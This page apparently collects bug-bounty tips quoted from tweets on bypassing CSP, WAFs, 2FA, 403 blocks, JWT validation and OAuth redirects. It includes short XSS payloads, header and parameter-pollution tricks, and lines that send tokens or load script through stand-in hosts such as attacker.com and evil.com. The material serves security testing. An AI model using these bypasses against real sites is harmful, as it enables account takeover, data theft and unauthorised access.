# Bypasses

* [It's possible to bypass #CSP with the following : #JSONP: \<script src="https://trustedsite/jsonp?callback=payload"> #AngularJS \<script src="https://trustedsite/angularjs/1.1.3/angularjs.min.js"> \<div ng-app ng-csp id=p ng-click=$event.view.alert(1)>](https://twitter.com/fasthm00/status/1083371791760818176)
* [Encountered with AWS WAF? Just add "\<!" (without quotes) before your payload and bypass that WAF. :) eg: \<!alert(1) #BugBounty #bugbountytip #bugbountytips](https://twitter.com/neeraj_sonaniya/status/1089235277250387969)
* [If the target is using @Cloudflare , dig in their DNS records and search for the origins IP address. If you attack the application directly by his IP’s cloudflare WAF will not be there.](https://twitter.com/rvismit/status/1090495957802860544)
* [Here is my obfuscated payload. It bypasses lots of WAF, including CloudFlare iirc.  iFrame with javascript URI payload. Line feeds \[CRLF\] obfuscate it.](https://twitter.com/LooseSecurity/status/1094615936223625216)
* [Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https://\*.foo.foo:\* Check if http://foo.foo is claimed. https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/ … #bugbountytip](https://twitter.com/ibrahimdraidia/status/1087031047571849217)
* [Testing authorization/access controls with a numeric ID? Try decimals/floats and round to the number you want to access. Example: admin role ID is 1 Try to set your ID to 0.9 and it may bypass the auth check as system will round up after auth check #bugbountytip #bugbounty](https://twitter.com/ameenmaali/status/1159558019551657984)
* [When hacking webapps, I have a little bag of bugs I always check for that are commonly missed. Here's one: I check if signing up with the same username as a deleted account will give me access to their old data.](https://twitter.com/hakluke/status/1183314554874318849)
* CSP Bypass, script-src 'self' data: - <https://twitter.com/404death/status/1191222237782659072>
* [Want to bypass file extension restriction ? try HTTP Parameter Pollution on the filename parameter](https://twitter.com/Hxzeroone/status/1250342399068352512).

![](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-M55TlR4-Ifp2VD8r0Q2%2F-M55hqUluNmEHEAZX7-U%2Fimage.png?alt=media\&token=33557684-fd39-43de-b8bb-d984c143a886)

* [I just happened to be able to bypass a 2FA in place during a recent engagement. And this was how I did it. #bugbountyTips #pentestTips Last /setup/ endpoint was by attacker while the first one is as victim.](https://twitter.com/imhaxormad/status/1252495614161506309)
  \*

![](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-M5G3kdjqWpnM7DVdiVu%2F-M5RCttFKFy7E15vZIX_%2Fimage.png?alt=media\&token=35c039f3-eeb5-4d81-99c2-17e8bc0fa79e)

* OTP bypass - <https://twitter.com/HackerHumble>
* [sometimes you find those PATHs that forwards to a login page & you can't see the content inside them. (ex: /path/to/secret --> Google login)](https://twitter.com/_ayoubfathi_/status/1041319555308707841)
* Let's say they use this CSP rule to restrict framing: content-security-policy: frame-ancestors 'self' https\://\*.foo.foo:\* Check if [http://foo.foo](https://t.co/fFNHNkaMK7?amp=1) is claimed. [https://blog.ibrahimdraidia.com/bypass-csp-framing-restriction-rule-olx/](https://t.co/gZfKRTWepX?amp=1) [#bugbountytip](https://twitter.com/hashtag/bugbountytip?src=hashtag_click)

{% embed url="<https://twitter.com/HackerHumble/status/1274259490322313219>" %}

Cloudfront Bypass -

{% embed url="<https://twitter.com/jzks3c/status/1263041062450475008>" %}

403 Bypass:

![https://twitter.com/RathiArpeet/status/1315593774773334016](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MKB2ayVeTORCPblf1iD%2F-MKB2mTKXUzWIf2bwQKw%2Fimage.png?alt=media\&token=abd56617-f8d3-4cf7-b343-574662069b3d)

{% embed url="<https://twitter.com/M404ntf/status/1318387981015724034>" %}

{% embed url="<https://twitter.com/remonsec/status/1315301941170249733>" %}

{% embed url="<https://twitter.com/remonsec/status/1316364534156677121>" %}

![https://twitter.com/hackerscrolls/status/1254701239360720900](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MN6ccuUv76YD_-SLXTX%2F-MN7SrOGHSCaJbHz4kwY%2Fimage.png?alt=media\&token=cc5cc231-579a-45cc-b4d9-719015cd18ef)

**Tool -**&#x20;

* <https://github.com/lobuhi/byp4xx>

* [h](https://github.com/Raywando/4xxbypass)[ttps://github.com/Raywando/4xxbypass](https://github.com/lobuhi/byp4xx)

* <https://github.com/sting8k/BurpSuite_403Bypasser>

* [if “origin” header not work, try with “x-\[org name\]-origin”, same think for all headers!! e.g x-uber-origin, x-uber-host,..etc](https://twitter.com/m4ll0k/status/1280803080624377857?s=20)

* [#bugbounty I Was able to bypass the Filter on OAUTH through FUZZ With URL-Encode Chars , Found that Website Add / before %5b when redirect the token Example : target/oauth?redirect\_uri=http://attacker.com%https://t.co/QSv7Vm2STd Redirect Token to : http://Attacker.com/%5b.target.comrget.com?token=…...](https://twitter.com/ElMrhassel/status/1282661956676182017?s=20)

* [Had some recent success using untranslatable Unicode in place of a "?" when attacking URL parsers for SSRF/OAuth issues.](https://twitter.com/samwcyo/status/1246997498981494784?s=20)

  [What worked was... \udfff -> � -> ?](https://twitter.com/samwcyo/status/1246997498981494784?s=20)

  [Therefore... {"redirectUri":"https://attacker\udfff@\[victim\]/"}](https://twitter.com/samwcyo/status/1246997498981494784?s=20)

  [Equals... Location: https://attacker?@\[victim\]/](https://twitter.com/samwcyo/status/1246997498981494784?s=20)

* [JWT Token Bypasses #2:](https://twitter.com/HackerHumble/status/1274314917907030017?s=20)

  1. [Capture the JWT token.](https://twitter.com/HackerHumble/status/1274314917907030017?s=20)
  2. [If the algorithm is RS256 change to HS256 and sign the token with the public key (which you can get by visiting jwks Uri / mostly it will be the public key from the site's https certificate) (1/2)](https://twitter.com/HackerHumble/status/1274314917907030017?s=20)

* [Access control vulnerabilities with blocked access can be bypassed by adding the X-Original-URL header. POST /admin/deleteUser HTTP/1.1 -> 403 POST / HTTP/1.1 X-Original-URL: /admin/deleteUser -> 200OK Bypass Success! #bugbounty #bu](https://twitter.com/jae_hak99/status/1285513974931288064?s=20)[gbountytip](https://twitter.com/hashtag/bugbountytip?src=hashtag_click)

* Price Manipulation -&#x20;

![https://twitter.com/SalahHasoneh1/status/1284869760921014274?s=20](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MT9uGioqlkbNTbw74-7%2F-MT9uPDqxkgsk4a7tGKT%2Fimage.png?alt=media\&token=3b5299e4-7b83-4d90-a52d-62db81f27732)

*

[{“id”:111} --> 401 Unauthriozied {“id”:{“id”:111}} --> 200 OK](https://twitter.com/jae_hak99/status/1302237358029332480?s=20)

[POST /api/get\_profile Content-Type: application/json {“user\_id”:,”user\_id”:}](https://twitter.com/jae_hak99/status/1302237358029332480?s=20)

[GET /api\_v1/messages?user\_id=VICTIM\_ID --> 401](https://twitter.com/jae_hak99/status/1302237358029332480?s=20)

[GET /api\_v1/messages?user\_id=attack\&user\_id=VICTIM --> 200 OK](https://twitter.com/jae_hak99/status/1302237358029332480?s=20)

* [How to find authentication bypass vulnerabilities. Focus. I Added headers.](https://twitter.com/jae_hak99/status/1292043668375744514?s=20)

  [Request GET /delete?user=test HTTP/1.1 Response HTTP/1.1 401 Unauthorized](https://twitter.com/jae_hak99/status/1292043668375744514?s=20)

  [Reqeust GET /delete?user=test HTTP/1.1 X-Custom-IP-Authorization: 127.0.0.1 Response HTTP/1.1 302 Found](https://twitter.com/jae_hak99/status/1292043668375744514?s=20)
* CSP -[ So: Site allows external '.css' stylesheets? Inject your XSS on your local 'style.css' an call it from external "\<svg>\<link href=//evil.com/style.css>" XSS will be injected in the html! (CSP it's on? but no style-src?) so hit the box dude! #bugbounty #infosec](https://twitter.com/akita_zen/status/1263963555805696004?s=20)
*

![https://twitter.com/iam\_j0ker/status/1303658167205728256?s=20](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MTeayegO_ZC4SOKjW3o%2F-MTebHg8OI8BG8zWV1nx%2Fimage.png?alt=media\&token=067802f2-4174-4b12-8460-441d9a1c540a)

* [CSP - Hates CSP? Me too I found HTML Injection in Bugcrowd Private (can't trigger script because of CSP). Staff change state to P5 (Content Spoofing).](https://twitter.com/xchopath/status/1164775304700628992?s=20)

  [But I can raise it again to P3 (Iframe Injection) and Triaged.](https://twitter.com/xchopath/status/1164775304700628992?s=20)

  [\<iframe src= blocked by CSP](https://twitter.com/xchopath/status/1164775304700628992?s=20)

  [Solution:](https://twitter.com/xchopath/status/1164775304700628992?s=20)

  [\<iframe srcdoc=](https://twitter.com/xchopath/status/1164775304700628992?s=20)

{% embed url="<https://twitter.com/d4rkhunt3r_/status/1314249917163077634?s=20>" %}

![](https://1889062997-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LbWrDBBrbM1WtGeIKRO%2F-MWEPZxcDTld5U7Emc0F%2F-MWEQ0G-MJy1Fs58xRMf%2Fimage.png?alt=media\&token=b5199529-a281-4a32-9930-f74a1fed2c44)

* [Auth bypass tip:](https://twitter.com/theCyberGuy0/status/1440095592898875395?s=20)

  [/api/ -> 403 Fuzzing -> not working Try: /api/application.wadl?detail=true](https://twitter.com/theCyberGuy0/status/1440095592898875395?s=20)

  [Found:](https://twitter.com/theCyberGuy0/status/1440095592898875395?s=20)

  [/api/etc/projects/{id} /api/etc/users/{id} /api/etc/admin/ Impact:\[ + \] PII Info disclosure \[ + \] Sensitive info leak \[ + \] Access admin endpoint #bugbantytips #bugbountytips](https://twitter.com/theCyberGuy0/status/1440095592898875395?s=20)
* [1. Found a subdomain with 404 error 2. Added /api ==> 401 error 3. Using FFUF find /api/v2/users endpoint. But still forbidden. 4. Bypass api protection using / ===> //api/v2/users Boom!! PII of internal user disclosure. #bugbounty #cybersecurity #infosec #bugbountytips](https://twitter.com/Sm4rty_/status/1368250042436308992?s=20)